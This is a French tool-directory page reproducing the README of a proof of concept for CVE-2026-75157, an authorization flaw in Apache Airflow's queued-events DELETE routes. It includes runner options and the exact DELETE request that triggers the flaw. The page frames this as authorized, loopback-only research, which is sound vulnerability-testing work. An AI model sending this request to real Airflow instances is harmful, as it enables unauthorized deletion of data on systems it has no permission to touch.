Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2026-75157-poc — PoC HTTP universel autonome et autorisé pour CVE-2026-75157 | Kitploit
Outils/GitHubGitHub/licitrasimone/cve-2026-75157-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests de Sécurité des APISécurité WebTests d'Intrusion
GitHublicitrasimone/cve-2026-75157-poc

cve-2026-75157-poc

PoC HTTP universel autonome et autorisé pour CVE-2026-75157

Voir le dépôt
27il y a 20 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-75157 PoC

PoC de recherche en sécurité autorisée pour la faille d'autorisation des queued-events d'Apache Airflow dans les versions antérieures à 3.3.2.

Périmètre

À exécuter uniquement contre une instance Airflow que vous possédez ou que vous êtes explicitement autorisé à tester. Le runner par défaut refuse les cibles non-loopback. Ce dépôt ne contient aucune logique de scan, d'énumération de cibles, de persistance, de vol d'identifiants ou de charge utile destructive.

Fichiers

README.md
poc.py

poc.py est un runner de requêtes HTTP universel et ciblé. Il accepte l'URL cible, la méthode, le chemin, les en-têtes, le corps, la source d'authentification et le résultat attendu depuis la ligne de commande au lieu de coder en dur un hôte.

Utilisation

Vérification de l'état contre un lab Airflow local :

python3 poc.py \
  --target http://127.0.0.1:18080 \
  --path /api/v2/monitor/health \
  --method GET \
  --expect-status 200 \
  --expect-body healthy

Déclenchement de la CVE contre une instance Airflow locale vulnérable déjà préparée :

export AIRFLOW_POC_TOKEN='lab-only-restricted-token'
python3 poc.py \
  --target http://127.0.0.1:18080 \
  --path /api/v2/dags/cve_2026_75157_poc_dag/assets/queuedEvents \
  --method DELETE \
  --bearer-env AIRFLOW_POC_TOKEN \
  --expect-status 204

Le token doit appartenir à un principal jetable disposant d'un accès en lecture aux DAG et d'un accès en suppression aux Assets. Le comportement vulnérable attendu est que le principal restreint peut supprimer le queued-event. Airflow 3.3.2 ou ultérieur devrait rejeter la même requête, sauf si le principal dispose également d'un accès en édition aux DAG.

Options

--target URL              Required absolute HTTP(S) target
--path PATH               Optional path joined to --target
--method METHOD           GET, POST, PUT, PATCH, DELETE, HEAD
--header 'Name: Value'    Repeatable request header
--bearer-env ENV          Read a bearer token from ENV without printing it
--json JSON               JSON request body
--body-file FILE          Raw request body
--expect-status STATUS    Repeatable expected status assertion
--expect-body TEXT        Repeatable response-body assertion
--timeout SECONDS
--no-follow-redirect
--allow-non-loopback      Explicit opt-in for an authorized non-lab target

Le runner renvoie le code de sortie 0 pour une assertion réussie, 1 pour les erreurs de périmètre/transport/argument, et 2 pour un échec d'assertion HTTP. Les valeurs d'autorisation et de cookie sont masquées dans la sortie.

Contexte de la vulnérabilité

Avant Airflow 3.3.2, les routes DELETE des queued-events vérifiaient l'axe DAG avec la permission de lecture plutôt qu'avec la permission d'édition. Le correctif remplace l'exigence d'autorisation DAG par la permission de niveau écriture. Ce PoC envoie la véritable requête HTTP ; il ne crée pas l'utilisateur de lab ni la fixture de base de données.

Références

  • https://www.openwall.com/lists/oss-security/2026/09/18/1
  • https://github.com/apache/airflow/pull/71736
  • https://airflow.apache.org/docs/apache-airflow/3.3.1/howto/docker-compose/index.html
  • https://airflow.apache.org/docs/apache-airflow-providers-fab/stable/auth-manager/access-control.html
Télécharger l’outil